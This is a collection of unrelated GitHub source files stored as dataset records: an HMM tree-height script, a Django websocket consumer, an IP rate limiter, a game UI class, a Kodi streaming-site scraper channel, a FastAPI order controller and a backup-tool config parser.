dictionary.keys()]\n return np.array(alpha_k_list)\n\ndef f(x, d):\n value = 0\n for key in d.keys():\n alpha = d[key][0]\n c = d[key][1]\n value += alpha*scipy.exp(c*x)\n return value\n\n################################### INPUT ####################################\n\n\n# observable = np.array([rnd.randint(0,1) for _ in range(N)])\n\n\n#################################### HMM #####################################\n\ndef forwardprop(obs, mu, rho, n):\n N = len(obs)\n lam = 1/n\n coef_list = []\n \n# zeroth iteration (first)\n coef_0 = dict()\n if obs[0] == 0:\n z_0 = lam / (lam + 2 * mu)\n \n alpha = lam / z_0\n c = - lam - 2 * mu\n key = str(round(c, 4))\n coef_0[key] = [alpha, c]\n else:\n z_0 = 2 * mu / (lam + 2 * mu)\n \n alpha = lam / z_0\n c = - lam\n key = str(round(c, 4))\n coef_0[key] = [alpha, c]\n \n alpha = -lam / z_0 \n c = - lam - 2 * mu\n key = str(round(c, 4))\n coef_0[key] = [alpha, c]\n coef_list.append(coef_0)\n\n for k in range(1, N):\n D = coef_list[k - 1] # previous dictionary\n coef_k = dict() # current dictionary\n A_K = alpha_k(D)\n C_K = c_k(D)\n if obs[k - 1] == 0:\n z_i = sum(A_K * (2 * rho * lam / \n ((lam + 2 * mu) * C_K * (C_K - 2 * rho)) - \n 1 / (C_K - 2 * rho - 2 * mu)))\n alpha = lam / z_i * sum(A_K * (1/(C_K-2*rho) - 1/(C_K)))\n c = -lam - 2 * mu\n key = str(round(c, 4))\n coef_k[key] = [alpha, c]\n for i in range(len(D)):\n alpha_new = A_K[i]/z_i\n c = C_K[i] - 2*rho - 2*mu\n key = str(round(c, 4))\n if key in coef_k.keys():\n coef_k[key][0] += alpha_new\n else:\n coef_k[key] = [alpha_new, c]\n else:\n z_i = sum(A_K*((1/C_K+1/(C_K-2*mu)) * (2 * mu / (lam + 2 * mu)) - \n 1 / (C_K - 2 * rho) + 1 / (C_K - 2 * rho - 2 * mu)))\n c = - lam\n alpha = lam / z_i * sum(A_K * (1/(C_K - 2 * rho) - 1/C_K))\n key = str(round(c, 4))\n coef_k[key] = [alpha, c]\n \n c = - lam - 2 * mu\n alpha = - alpha\n key = str(round(c, 4))\n coef_k[key] = [alpha, c]\n for i in range(len(D)):\n alpha_new = A_K[i]/z_i\n c_1 = C_K[i] - 2 * rho\n key_1 = str(round(c_1, 4))\n\n c_2 = C_K[i] - 2*rho - 2*mu\n key_2 = str(round(c_2, 4))\n if key_1 in coef_k.keys():\n coef_k[key_1][0] += alpha_new\n else:\n coef_k[key_1] = [alpha_new, c_1]\n if key_2 in coef_k.keys():\n coef_k[key_2][0] += - alpha_new\n else:\n coef_k[key_2] = [- alpha_new, c_2]\n coef_list.append(coef_k)\n return coef_list\n\n\ndef backwardprop(ceof_list, obs, mu, rho, n):\n N = len(obs)\n lam = 1/n\n height_list = [0 for _ in range(N)]\n argmax_n = scipy.optimize.fmin(lambda x: -f(x, ceof_list[-1]), 0)[0]\n if argmax_n < 0:\n print(0)\n height_list[-1] = argmax_n\n for i in range(2, N + 1):\n t_prev = height_list[-i+1]\n if obs[-i] == 0:\n p_eq = ((1 - np.exp(-2 * rho * t_prev)) * lam * np.exp(-lam*t_prev) \n + np.exp(-2 * rho * t_prev)) * np.exp(-2 * mu * t_prev)\n p_ineq = (1 - np.exp(-2 * rho * t_prev)) * lam\n if p_eq > p_ineq:\n t_i = t_prev\n else:\n t_i = 0\n if t_i < 0:\n print(i, 1)\n height_list[-i] = t_i\n elif obs[-i] == 1:\n p_eq = ((1 - np.exp(-2 * rho * t_prev)) * lam * np.exp(-lam*t_prev) \n + np.exp(-2 * rho * t_prev)) * (1 - np.exp(-2 * mu * t_prev))\n p_ineq = ((1 - np.exp(-2 * rho * t_prev)) * 2 * mu * lam / (2 * mu + lam) + \n (lam / (2 * mu + lam))**(lam / (2 * mu)))\n if p_eq > p_ineq:\n t_i = t_prev\n else:\n t_i = - np.log(lam / (2 * mu + lam)) / (2 * mu)\n if t_i < 0:\n print(i, 2)\n height_list[-i] = t_i\n return height_list\n\n\ndef backwardprop2(coef_list, obs, mu, rho, n):\n N = len(obs)\n height_list = [scipy.optimize.fmin(lambda x: -f(x, coef), 0)[0] for coef in coef_list]\n return 
height_list","repo_name":"amovsheva/Forest","sub_path":"TreeHeightRecon.py","file_name":"TreeHeightRecon.py","file_ext":"py","file_size_in_byte":4982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"27408235834","text":"import json\nimport threading\n\n\nfrom time import sleep\nfrom asgiref.sync import sync_to_async\n\n\nfrom channels.generic.websocket import WebsocketConsumer\n\n\nfrom phrases.models.models import StoryTopic\nfrom phrases.generator import PhraseGenerator\n\n\nfrom gameplay.codes import (\n Code, FirstPhrasesGenerated, NotEnoughPhrasesToReturn, TopicNotFound, TopicSelected,\n ReturnPentagonPhrases, ReturnMonoPhrase, SelectTopic, PhrasesP5, PhrasesP1\n)\n\n\nfrom print_pp.logging import Print\n\n\n\nBACKEND_CODES_INFORMATION = {\n \"BGT-200\": \"Topic selected\",\n \"BGT-400\": \"Topic not selected\",\n\n \"BGP-200\": \"First phrases generated\",\n \"BGP-205\": \"Not enough phrases to return\",\n}\n\n\nFRONTEND_CODES_INFORMATION = {\n \"FGT-101\": \"Select topic\",\n\n \"FGP-100\": \"Start phrase generation\",\n \"FGP-101\": \"Returns 5 phrases\",\n \"FGP-102\": \"Returns 1 phrases\",\n}\n\n\nclass GamePlayConsumer(WebsocketConsumer):\n\n MAX_OPTIONS_TO_GENERATE = 20\n\n\n def __init__(self, *args, **kwargs):\n self.current_topic = None\n self.codes = {\n SelectTopic.code: self.set_current_topic,\n ReturnPentagonPhrases.code: self.return_phrases,\n ReturnMonoPhrase.code: self.return_phrases,\n }\n super().__init__(*args, **kwargs)\n self.phrases_generator = PhraseGenerator(self.current_topic, testing=True)\n\n\n def connect(self):\n self.options:list = list()\n self.options_lock = threading.Lock()\n self.accept()\n \n\n def disconnect(self, close_code):\n pass\n\n\n def receive(self, text_data):\n text_data_json = json.loads(text_data)\n \n if text_data_json[\"code\"] == 'FGP-100':\n threading.Thread(target=self.generate_phrases).start()\n return\n\n self.codes[text_data_json[\"code\"]](text_data_json)\n\n\n def generate_phrases(self) -> list[str]:\n is_first_time = True\n\n while True:\n sleep(2)\n options_to_generate = self.MAX_OPTIONS_TO_GENERATE - len(self.options)\n if is_first_time: options_to_generate = 5\n\n if options_to_generate < 0:\n continue\n \n with self.options_lock:\n options = self.phrases_generator.generate_phrases(num_phrases=options_to_generate)\n self.options.extend(options)\n \n if is_first_time:\n self.send_response(code=FirstPhrasesGenerated)\n is_first_time = False\n\n \n def return_phrases(self, data:dict):\n \n\n if data['code'] == ReturnMonoPhrase.code:\n options_to_return = 1\n code_to_return = PhrasesP1\n elif data['code'] == ReturnPentagonPhrases.code:\n options_to_return = 5\n code_to_return = PhrasesP5\n\n if not self.options:\n self.send_response(code=NotEnoughPhrasesToReturn)\n return\n\n with self.options_lock:\n self.send_response(code_to_return, extra_data={\"options\": self.options[:options_to_return]})\n self.options = self.options[5:]\n\n\n def set_current_topic(self, data:dict):\n \n topic_id = data['topic_id']\n\n if topic_id == \"NONE\":\n self.current_topic = None\n return\n\n try: \n self.current_topic = StoryTopic.objects.get(id=topic_id).name\n except StoryTopic.DoesNotExist: \n self.send_response(code=TopicNotFound)\n\n self.send_response(code=TopicSelected, extra_data={\"topic_name\": self.current_topic})\n\n \n def send_response(self, code:Code, extra_data:dict=None):\n \n if code:\n data = {\"code\": code.code}\n else:\n data = dict()\n \n if extra_data: \n 
data.update(extra_data)\n \n self.send(text_data=json.dumps(data))\n\n","repo_name":"i27ae15/project_dump_api","sub_path":"gameplay/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":3832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"9256947157","text":"from utils.database import *\nimport bson.json_util as json_util\nimport json\nimport time\n\nclass Protection:\n def __init__(self):\n self.ip_requests = {}\n self.ip_blocked = {}\n self.request_limit = 50\n self.time_period = 10\n self.block_period = 30\n\n def handle_protection(self, ip_address):\n # Check if ip is blocked already\n if ip_address in self.ip_blocked:\n timer = time.time() - self.ip_blocked[ip_address] < self.block_period\n if timer:\n response_data = \"BLOCKED, TOO MANY REQUESTS >:(\"\n response_json = json.dumps(response_data)\n return response_json, 429\n\n # Check if this request exceeds the limit, if it does, sent a 429\n if self.check_ip_limit(ip_address):\n self.block_ip(ip_address)\n if ip_address in self.ip_blocked and time.time() - self.ip_blocked[ip_address] >= self.block_period:\n self.unblock_ip(ip_address)\n return None\n # self.unblock_ip(ip_address)\n response_data = \"BLOCKED, TOO MANY REQUESTS >:(\"\n response_json = json.dumps(response_data)\n return response_json, 429\n # print(\"THIS IS GOOD\")\n # print(\"DICT BEFORE: \" + str(self.ip_requests))\n # If else, add the address to the requests\n self.set_ip_timer(ip_address)\n # print(\"DICT After: \" + str(self.ip_requests))\n return None\n\n def set_ip_timer(self, ip_address):\n if ip_address in self.ip_requests:\n curr_time = time.time()\n elapsed_time = curr_time - self.ip_requests[ip_address][\"start_time\"]\n if elapsed_time >= self.time_period:\n # Reset Start Time and count\n self.ip_requests[ip_address][\"start_time\"] = curr_time\n self.ip_requests[ip_address][\"count\"] = 0\n else:\n self.ip_requests[ip_address][\"count\"] += 1\n else:\n self.ip_requests[ip_address] = self.ip_requests.get(ip_address, {\"count\": 0, \"start_time\": time.time()})\n\n def check_ip_limit(self, ip_address):\n if ip_address in self.ip_requests:\n elapsed_time = time.time() - self.ip_requests[ip_address][\"start_time\"]\n # print(\"checkign elapsed time: \" + str(elapsed_time))\n if elapsed_time < self.time_period:\n # print(\"@@ ELAPSED TIME < TIME PERIOD @@\")\n # print(\"IP requests count: \" + str(self.ip_requests[ip_address][\"count\"]))\n # print(\"request limit: \" + str(self.request_limit))\n if self.ip_requests[ip_address][\"count\"] > self.request_limit:\n # print(\"@@ BLOCKED TOO MANY REQUESTS @@\")\n return True\n return False\n\n def block_ip(self, ip_address):\n # respond with a ip limit 429 Too Many Requests for 30 seconds\n # adds ip to blocked dictionary with the time\n self.ip_blocked[ip_address] = time.time()\n self.ip_requests[ip_address][\"count\"] += 1\n\n def unblock_ip(self, ip_address):\n # check if timer has expired, then unblock\n if ip_address in self.ip_blocked and time.time() - self.ip_blocked[ip_address] >= self.block_period:\n del self.ip_blocked[ip_address]\n self.ip_requests[ip_address][\"count\"] = 0 # Reset count when IP is unblocked\n","repo_name":"cronrad/Ending_from_the_Back","sub_path":"utils/dosprotection.py","file_name":"dosprotection.py","file_ext":"py","file_size_in_byte":3402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"8370570817","text":"import arcade\nimport 
arcade.gui\nimport main\nimport soundoptions\nimport generaloptions\n\n\nclass UserInterface():\n '''Class for option mennue accessed by \"ESCAPE\"'''\n\n def __init__(self, sfx_player, music_player, window_class):\n self.points: int = 0\n # self.uimanager = arcade.gui.UIManager()\n self.points = 10\n #self.sound_options = soundoptions.SoundOptions(music_player)\n self.window_class = window_class\n self.sfx_player = sfx_player\n self.general_options = generaloptions.GeneralOptions(self.sfx_player, music_player, self.window_class)\n main.GAME_MANAGER.current_options = self.general_options\n\n\n\n def recive_key_down(self, key):\n # if escape iif pressed and options are openn sett all options to false\n if key == arcade.key.ESCAPE: \n if main.GAME_MANAGER.open_options:\n self.window_class.pause = False\n main.GAME_MANAGER.open_options = False\n main.GAME_MANAGER.current_options.disable()\n\n else:\n # if no optiosn open and press scape start standard optionns\n self.window_class.pause = True\n main.GAME_MANAGER.open_options = True\n main.GAME_MANAGER.current_options = self.general_options\n main.GAME_MANAGER.current_options.option_buttons()\n\n def update_score(self):\n self.points = int(main.GAME_MANAGER.score)\n\n def draw_self(self):\n # socriing\n arcade.draw_text(\n self.points,\n main.SCREEN_WIDTH / 22,\n main.SCREEN_HEIGHT / 1.1,\n arcade.color.BABY_BLUE,\n 40,\n 40,\n ) # anchor_x=\"right\", anchor_y=\"top\" to channge to top right cornner\n # draw the buttons for diferennt options\n if main.GAME_MANAGER.open_options:\n main.GAME_MANAGER.current_options.draw_self()\n","repo_name":"Herjeman/StudioRakkas-In-the-Shadows","sub_path":"userinterface.py","file_name":"userinterface.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18533253628","text":"# -*- coding: utf-8 -*-\n# ------------------------------------------------------------\n# streamondemand.- XBMC Plugin\n# Canale filmsenzalimiti\n# http://www.mimediacenter.info/foro/viewforum.php?f=36\n# ------------------------------------------------------------\nimport re\n\nfrom core import config, httptools\nfrom platformcode import logger\nfrom core import scrapertools\nfrom core import servertools\nfrom core.item import Item\nfrom core.tmdb import infoSod\n\n__channel__ = \"filmsenzalimiti\"\n\nhost = \"http://filmsenzalimiti.black\"\n\n\ndef mainlist(item):\n logger.info(\"[filmsenzalimiti.py] mainlist\")\n\n itemlist = [Item(channel=__channel__,\n title=\"[COLOR azure]Film Del Cinema[/COLOR]\",\n action=\"novedades\",\n extra=\"movie\",\n url=\"%s/genere/film\" % host,\n thumbnail=\"http://orig03.deviantart.net/6889/f/2014/079/7/b/movies_and_popcorn_folder_icon_by_matheusgrilo-d7ay4tw.png\"),\n Item(channel=__channel__,\n title=\"[COLOR azure]Film HD[/COLOR]\",\n action=\"novedades\",\n extra=\"movie\",\n url=\"%s/?s=[HD]\" % host,\n thumbnail=\"http://orig03.deviantart.net/6889/f/2014/079/7/b/movies_and_popcorn_folder_icon_by_matheusgrilo-d7ay4tw.png\"),\n Item(channel=__channel__,\n title=\"[COLOR azure]Categorie[/COLOR]\",\n action=\"categorias\",\n url=\"%s/genere/film\" % host,\n thumbnail=\"http://orig03.deviantart.net/6889/f/2014/079/7/b/movies_and_popcorn_folder_icon_by_matheusgrilo-d7ay4tw.png\"),\n Item(channel=__channel__,\n action=\"search\",\n extra=\"movie\",\n title=\"[COLOR yellow]Cerca...[/COLOR]\",\n thumbnail=\"http://dc467.4shared.com/img/fEbJqOum/s7/13feaf0c8c0/Search\"),\n Item(channel=__channel__,\n 
title=\"[COLOR azure]Serie TV[/COLOR]\",\n extra=\"serie\",\n action=\"novedades_tv\",\n url=\"%s/genere/serie-tv\" % host,\n thumbnail=\"http://orig03.deviantart.net/6889/f/2014/079/7/b/movies_and_popcorn_folder_icon_by_matheusgrilo-d7ay4tw.png\"),\n Item(channel=__channel__,\n title=\"[COLOR yellow]Cerca Serie TV...[/COLOR]\",\n action=\"search\",\n extra=\"serie\",\n thumbnail=\"http://dc467.4shared.com/img/fEbJqOum/s7/13feaf0c8c0/Search\")]\n return itemlist\n\n\ndef newest(categoria):\n logger.info(\"[filmsenzalimiti.py] newest\" + categoria)\n itemlist = []\n item = Item()\n try:\n if categoria == \"peliculas\":\n item.url = host + \"/genere/film\"\n item.action = \"novedades\"\n itemlist = novedades(item)\n\n if itemlist[-1].action == \"novedades\":\n itemlist.pop()\n\n # Keep searching in case of an error\n except:\n import sys\n for line in sys.exc_info():\n logger.error(\"{0}\".format(line))\n return []\n\n return itemlist\n\n\ndef categorias(item):\n logger.info(\"[filmsenzalimiti.py] categorias\")\n itemlist = []\n\n # Load the page\n data = httptools.downloadpage(item.url).data\n data = scrapertools.get_match(data, 'Categorie(.*?)')\n patron = '<li><a href=\"([^\"]+)\">([^<]+)'\n matches = re.compile(patron, re.DOTALL).findall(data)\n\n for scrapedurl, scrapedtitle in matches:\n if scrapedtitle.startswith((\"PRIME\")):\n continue\n if scrapedtitle.startswith((\"ULTIME\")):\n continue\n itemlist.append(\n Item(channel=__channel__,\n action=\"novedades\",\n title=\"[COLOR azure]\" + scrapedtitle + \"[/COLOR]\",\n url=host + scrapedurl,\n thumbnail=\"http://orig03.deviantart.net/6889/f/2014/079/7/b/movies_and_popcorn_folder_icon_by_matheusgrilo-d7ay4tw.png\",\n extra=item.extra,\n folder=True))\n\n return itemlist\n\n\ndef search(item, texto):\n logger.info(\"[filmsenzalimiti.py] \" + item.url + \" search \" + texto)\n item.url = host + \"/?s=\" + texto\n try:\n if item.extra == \"movie\":\n return novedades(item)\n if item.extra == \"serie\":\n return novedades_tv(item)\n # Keep searching in case of an error\n except:\n import sys\n for line in sys.exc_info():\n logger.error(\"%s\" % line)\n return []\n\n\ndef novedades(item):\n logger.info(\"[filmsenzalimiti.py] novedades\")\n itemlist = []\n\n # Load the page\n data = httptools.downloadpage(item.url).data\n\n patronvideos = '<li><a href=\"([^\"]+)\">\s*<img src=\"([^\"]+)\">(.*?)<\/div>'\n matches = re.compile(patronvideos, re.DOTALL).findall(data)\n\n for scrapedurl, scrapedthumbnail, scrapedtitle in matches:\n scrapedplot = \"\"\n itemlist.append(infoSod(\n Item(channel=__channel__,\n action=\"findvideos\",\n contentType=\"movie\",\n fulltitle=scrapedtitle,\n show=scrapedtitle,\n title=\"[COLOR azure]\" + scrapedtitle + \"[/COLOR]\",\n url=scrapedurl,\n thumbnail=scrapedthumbnail,\n plot=scrapedplot,\n extra=item.extra,\n folder=True), tipo='movie'))\n\n try:\n next_page = scrapertools.get_match(data, '<li><a href=\"([^\"]+)\">Pagina successiva')\n itemlist.append(\n Item(channel=__channel__,\n action=\"novedades\",\n title=\"[COLOR orange]Successivo >>[/COLOR]\",\n url=next_page,\n thumbnail=\"http://2.bp.blogspot.com/-fE9tzwmjaeQ/UcM2apxDtjI/AAAAAAAAeeg/WKSGM2TADLM/s1600/pager+old.png\",\n extra=item.extra,\n folder=True))\n except:\n pass\n\n return itemlist\n\n\ndef novedades_tv(item):\n logger.info(\"[filmsenzalimiti.py] novedades_tv\")\n itemlist = []\n\n # Load the page\n data = httptools.downloadpage(item.url).data\n\n patronvideos = '<li><a href=\"([^\"]+)\">\s*<img src=\"([^\"]+)\">(.*?)<\/div>'\n matches = re.compile(patronvideos, re.DOTALL).findall(data)\n\n for scrapedurl, scrapedthumbnail, scrapedtitle in matches:\n scrapedplot = \"\"\n itemlist.append(infoSod(\n Item(channel=__channel__,\n action=\"episodios\",\n fulltitle=scrapedtitle,\n show=scrapedtitle,\n title=\"[COLOR azure]\" + scrapedtitle + \"[/COLOR]\",\n url=scrapedurl,\n thumbnail=scrapedthumbnail,\n plot=scrapedplot,\n extra=item.extra,\n folder=True), tipo='tv'))\n\n try:\n next_page = scrapertools.get_match(data, '<li><a href=\"([^\"]+)\">Pagina successiva')\n itemlist.append(\n Item(channel=__channel__,\n action=\"novedades_tv\",\n title=\"[COLOR orange]Successivo >>[/COLOR]\",\n url=next_page,\n thumbnail=\"http://2.bp.blogspot.com/-fE9tzwmjaeQ/UcM2apxDtjI/AAAAAAAAeeg/WKSGM2TADLM/s1600/pager+old.png\",\n extra=item.extra,\n folder=True))\n except:\n pass\n\n return itemlist\n\n\ndef episodios(item):\n def load_episodios(html, item, itemlist, lang_title):\n patron = '((?:.*?<a href=\"[^\"]+\">[^<]+<\/a>)+)'\n matches = re.compile(patron).findall(html)\n for data in matches:\n # Extract the contents\n scrapedtitle = data.split('<a ')[0]\n scrapedtitle = re.sub(r'<[^>]*>', '', scrapedtitle).strip()\n if scrapedtitle != 'Categorie':\n scrapedtitle = scrapedtitle.replace('×', 'x')\n itemlist.append(\n Item(channel=__channel__,\n action=\"findvideos\",\n contentType=\"episode\",\n title=\"[COLOR azure]%s[/COLOR]\" % (scrapedtitle + \" (\" + lang_title + \")\"),\n url=data,\n thumbnail=item.thumbnail,\n extra=item.extra,\n fulltitle=scrapedtitle + \" (\" + lang_title + \")\" + ' - ' + item.show,\n show=item.show))\n\n logger.info(\"[filmsenzalimiti.py] episodios\")\n\n itemlist = []\n\n # Load the page\n data = httptools.downloadpage(item.url).data\n data = scrapertools.decodeHtmlentities(data)\n\n lang_titles = []\n starts = []\n patron = r\"STAGIONE.*?ITA\"\n matches = re.compile(patron, re.IGNORECASE).finditer(data)\n for match in matches:\n season_title = match.group()\n if season_title != '':\n lang_titles.append('SUB ITA' if 'SUB' in season_title.upper() else 'ITA')\n starts.append(match.end())\n\n i = 1\n len_lang_titles = len(lang_titles)\n\n while i <= len_lang_titles:\n inizio = starts[i - 1]\n fine = starts[i] if i < len_lang_titles else -1\n\n html = data[inizio:fine]\n lang_title = lang_titles[i - 1]\n\n load_episodios(html, item, itemlist, lang_title)\n\n i += 1\n\n if config.get_library_support() and len(itemlist) != 0:\n itemlist.append(\n Item(channel=__channel__,\n title=\"Aggiungi alla libreria\",\n url=item.url,\n action=\"add_serie_to_library\",\n extra=\"episodios\" + \"###\" + item.extra,\n show=item.show))\n\n return itemlist\n\n\ndef findvideos(item):\n logger.info(\"[filmsenzalimiti.py] findvideos\")\n\n # Load the page\n data = item.url if item.extra == 'serie' else httptools.downloadpage(item.url).data\n\n itemlist = servertools.find_video_items(data=data)\n\n for videoitem in itemlist:\n server = re.sub(r'[-\[\]\s]+', '', videoitem.title).capitalize()\n videoitem.title = \"\".join([\"[%s] \" % color(server, 'orange'), item.title])\n videoitem.fulltitle = item.fulltitle\n videoitem.thumbnail = item.thumbnail\n videoitem.show = item.show\n videoitem.plot = item.plot\n videoitem.channel = __channel__\n\n return itemlist\n\ndef color(text, color):\n return \"[COLOR \" + color + \"]\" + text + \"[/COLOR]\"\n\n","repo_name":"kodirepositoryluxy/KM17_15.01.18-2","sub_path":"addons/temp/7f2aab45-9907-4492-8741-fac27e7e9ac8/channels/filmsenzalimiti.py","file_name":"filmsenzalimiti.py","file_ext":"py","file_size_in_byte":10521,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"1329178302","text":"from fastapi import HTTPException, status\n\nfrom carrinho_compras.controller import uteis\nfrom carrinho_compras.persistence import pedidos\nfrom carrinho_compras.schemas.pedidos import *\n\n\nasync def insere_pedido(pedido: PedidoSchema):\n resultado = await pedidos.insere_pedido(pedido)\n return resultado\n\n\nasync def busca_pedido_por_id(id_pedido: str):\n resultado = await 
pedidos.busca_pedido_por_id(id_pedido)\n return resultado\n\n\nasync def busca_pedidos_por_cliente(\n email_cliente: EmailStr, numero_pagina: int, qtde_por_pagina: int\n) -> ListaPedidos:\n\n registros_pular, qtde_por_pagina = await uteis.ajusta_paginacao(\n numero_pagina, qtde_por_pagina\n )\n\n lista_pedidos = await pedidos.busca_pedidos_por_cliente(\n email_cliente, registros_pular, qtde_por_pagina\n )\n\n if len(lista_pedidos.pedidos) != 0:\n if numero_pagina == 0:\n numero_pagina = 1\n lista_pedidos.numero_pagina = numero_pagina\n lista_pedidos.qtde_por_pagina = qtde_por_pagina\n return lista_pedidos\n\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=\"Não foram encontrados pedidos para o cliente\",\n )\n\n\nasync def busca_pedidos_por_produto(\n codigo_produto: str,\n cor_produto: str,\n tamanho_produto: int,\n numero_pagina: int,\n qtde_por_pagina: int,\n) -> ListaPedidos:\n\n registros_pular, qtde_por_pagina = await uteis.ajusta_paginacao(\n numero_pagina, qtde_por_pagina\n )\n\n filtro_produto = await uteis.gera_filtro_produto(\n codigo_produto, cor_produto, tamanho_produto\n )\n\n resultado = await pedidos.busca_pedidos_por_produto(\n filtro_produto, registros_pular, qtde_por_pagina\n )\n if numero_pagina == 0:\n numero_pagina = 1\n resultado.numero_pagina = numero_pagina\n resultado.qtde_por_pagina = qtde_por_pagina\n\n if resultado:\n return resultado\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=\"Não foram encontrados pedidos com o produto\",\n )\n\n\nasync def busca_produtos_mais_vendidos(\n numero_pagina: int, qtde_por_pagina: int\n) -> ProdutosMaisVendidos:\n\n registros_pular, qtde_por_pagina = await uteis.ajusta_paginacao(\n numero_pagina, qtde_por_pagina\n )\n\n resultado = await pedidos.busca_produtos_mais_vendidos(\n registros_pular, qtde_por_pagina\n )\n if numero_pagina == 0:\n numero_pagina = 1\n resultado.numero_pagina = numero_pagina\n resultado.qtde_por_pagina = qtde_por_pagina\n\n if resultado:\n return resultado\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=\"Não foram encontrados registros para os parâmetros especificados\",\n )\n\n\nasync def busca_total_pedidos_por_cliente(\n numero_pagina: int, qtde_por_pagina: int, ordenacao: str\n) -> TotalPedidoClientes:\n\n registros_pular, qtde_por_pagina = await uteis.ajusta_paginacao(\n numero_pagina, qtde_por_pagina\n )\n\n if ordenacao.upper() == \"QUANTIDADE\":\n ordenacao_filtro = \"quantidade_total\"\n elif ordenacao.upper() == \"VALOR\":\n ordenacao_filtro = \"valor_total\"\n\n resultado = await pedidos.busca_total_pedidos_por_cliente(\n registros_pular, qtde_por_pagina, ordenacao_filtro\n )\n if numero_pagina == 0:\n numero_pagina = 1\n resultado.numero_pagina = numero_pagina\n resultado.qtde_por_pagina = qtde_por_pagina\n\n if resultado:\n return resultado\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=\"Não foram encontrados registros para os parâmetros especificados\",\n )\n","repo_name":"luizacode5/carrinho_compras_calcados","sub_path":"carrinho_compras/controller/pedidos.py","file_name":"pedidos.py","file_ext":"py","file_size_in_byte":3634,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12613262871","text":"import sys, configparser, os, os.path, re, shlex\n\nimport schedules, rmpolicies\nfrom errors import BackupError\n\nclass Config:\n def __init__(self, filename):\n if not os.path.exists(filename):\n raise BackupError('Configuration file 
{} does not exist'\n .format(filename))\n\n parser = configparser.ConfigParser()\n parser['DEFAULT'] = {\n 'FullBackupsInterval': 'monthly',\n 'IncrBackupsInterval': 'daily',\n 'RemovalPolicy': 'thinning',\n 'IgnoreChangingFiles': False,\n 'LogsBackupCount': 60\n }\n\n parser.read(filename)\n\n self.instances = []\n\n for section_name, section in parser.items():\n if section_name == 'DEFAULT': continue\n if not section_name.lower().startswith('backup '):\n raise BackupError('Configuration file section name \"{}\" is '\n 'invalid: must begin with \"Backup \"'\n .format(section_name))\n cfg = _ConfigInstance()\n cfg.name = section_name[7:]\n cfg.dest_dir = self._required_value(section, section_name,\n 'DestinationDir')\n cfg.dar_args = self._get_dar_args(section, section_name)\n cfg.capacity = self._get_capacity_value(section, section_name)\n cfg.full_intvl = schedules.schedule_by_name(\n section['FullBackupsInterval'])\n cfg.incr_intvl = schedules.schedule_by_name(\n section['IncrBackupsInterval'])\n cfg.rmpolicy = rmpolicies.rmpolicy_by_name(section['RemovalPolicy'])\n cfg.ignore_changing_files = self._bool_value(section, section_name,\n 'IgnoreChangingFiles')\n cfg.logfilename = section.get('LogfileName')\n cfg.logsbackupcount = int(section.get('LogsBackupCount'))\n self.instances.append(cfg)\n\n def _required_value(self, section, section_name, name):\n if name not in section:\n raise BackupError('Configuration file section \"{}\" is missing '\n 'required setting \"{}\"'.format(section_name,\n name))\n return section[name]\n\n def _bool_value(self, section, section_name, name):\n value = section[name]\n if isinstance(value, bool): return value\n v = value.lower()\n if v in ('1', 'yes', 'true', 'on'):\n return True\n elif v in ('0', 'no', 'false', 'off'):\n return False\n else:\n raise BackupError('Configuration file section \"{}\" setting \"{}\" '\n 'is not a valid boolean value'.format(\n section_name, name))\n\n def _get_dar_args(self, section, section_name):\n s = self._required_value(section, section_name, 'DarArguments')\n return shlex.split(s)\n\n CAPA_RE = re.compile(r'[0-9]+[kmgtp]$', re.IGNORECASE)\n CAPA_SUFFIX_FACTORS = {\n 'k': (1 << 10),\n 'm': (1 << 20),\n 'g': (1 << 30),\n 't': (1 << 40),\n 'p': (1 << 50)\n }\n\n def _get_capacity_value(self, section, section_name):\n s = self._required_value(section, section_name, 'Capacity')\n m = self.CAPA_RE.match(s)\n if not m:\n raise BackupError('Configuration file section \"{}\" has bad '\n 'Capacity value \"{}\": must match /^{}/'.format(\n section_name, s, self.CAPA_RE.pattern))\n return int(s[:-1]) * self.CAPA_SUFFIX_FACTORS[s[-1].lower()]\n\nclass _ConfigInstance: pass\n\n_DEFAULT_CONFIG = b'''\\\n# darbup configuration file\n#\n# General format: .ini file style.\n# One section per set of data you wish to archive.\n#\n# Example section (remove '#' to uncomment):\n#\n# [Backup stuff]\n# # Section names must begin with \"Backup \". The arbitrary identifier that\n# # follows determines the basename of generate archives.\n#\n# DarArguments=-R /home/fred\n# # Arguments passed to /usr/bin/dar. Do NOT include -c or -A, as darbup adds\n# # those arguments automatically as required. Typically, you just want a -R to\n# # specify the directory you want to archive, perhaps with some -I/-X/-P/-g\n# # for further refinement. Compression options like -z may also be useful.\n#\n# DestinationDir=/backup\n# # Directory where to place the generated archive files\n#\n# Capacity=500G\n# # Maximum amount of space to use for archives. 
Valid suffixes are K, M, G, T,\n# # P, for KiBi-, MeBi-, GiBi-, TeBi-, PeBi-bytes, respectively.\n# # Note 1: only archives generated by darbup are taken into account when\n# # calculating used space.\n# # Note 2: currently, there is no check for whether the disk is full, so make\n# # sure this value does not exceed the actual free space (otherwise darbup will\n# # fail with a nasty error when the disk is full).\n#\n# FullBackupsInterval=monthly\n# # Frequency with which to generate full (non-incremental) backups. Valid\n# # values:\n# # - monthly: creates a new full backup if the calendar month has changed\n# # since the last time a full backup was made\n# # - daily: creates a new full backup if the day (00:00-23:59 period) has\n# # changed since the time a full backup was made\n# # - always: creates a new full backup on every invocation of darbup\n#\n# IncrBackupsInterval=daily\n# # Frequency with which to generate incremental backups. These are incremental\n# # relative to the previous backup (which may itself be incremental). Valid\n# # values are the same as for FullBackupsInterval.\n#\n# RemovalPolicy=thinning\n# # When the disk is full -- as defined by the Capacity option -- we must delete\n# # an old archive. This option determines how we pick it. Valid values:\n# # - thinning: use a 